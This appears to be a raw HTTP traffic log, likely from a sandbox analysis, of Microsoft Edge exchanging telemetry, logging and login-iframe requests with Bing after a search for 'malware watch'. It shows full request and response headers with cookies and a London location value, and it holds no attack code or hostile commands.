cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fd91
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 204
date: Thu, 30 Jan 2025 22:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274630.1ad10443
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.PPT&DATA={%22S%22:529,%22E%22:1661,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.PPT&DATA={%22S%22:529,%22E%22:1661,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 200
pragma: no-cache
content-length: 233
content-type: text/html; charset=utf-8
content-encoding: br
expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 679bf7460927421d81c0d7b1a63e3463
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-mwai+QGgbSCm8/NGXoaJ6iPc/i2LTaxVsgvnRgmsiVM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 5E950716EA394A50A21B25CDC27C7E9B Ref B: LON601060106042 Ref C: 2025-01-30T22:03:50Z
date: Thu, 30 Jan 2025 22:03:50 GMT
set-cookie: .MSA.Auth=; expires=Thu, 01 Jan 1970 00:00:00 GMT; domain=.bing.com; path=/; secure; samesite=lax; httponly
set-cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D; expires=Tue, 24-Feb-2026 22:03:50 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274630.1ad105ac
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1738274628324%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22713.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1738274628326%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221928.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1738274628326%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628330%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1738274628324%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22713.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1738274628326%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221928.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1738274628326%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628330%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
access-control-allow-origin: https://www.bing.com
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 679bf74713ee43f296facbf9ef0bb4f8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-by/YrCqcxiazzFRJji+JjLz0mhi9ltDFGtJLR9h5/v0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274631.1ad10a0f
-
Remote address:88.221.135.16:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 18453
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628&WTS=63873871427
ResponseHTTP/2.0 204
date: Thu, 30 Jan 2025 22:03:54 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274634.1ad12237
-
Remote address:88.221.135.16:443RequestGET /secure/Passport.aspx?popup=1&ssl=1 HTTP/2.0
host: www.bing.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628&WTS=63873871427
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:04:23 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274663.1ad1dfb7
-
Remote address:88.221.135.16:443RequestGET /ipv6test/test?FORM=MONITR HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
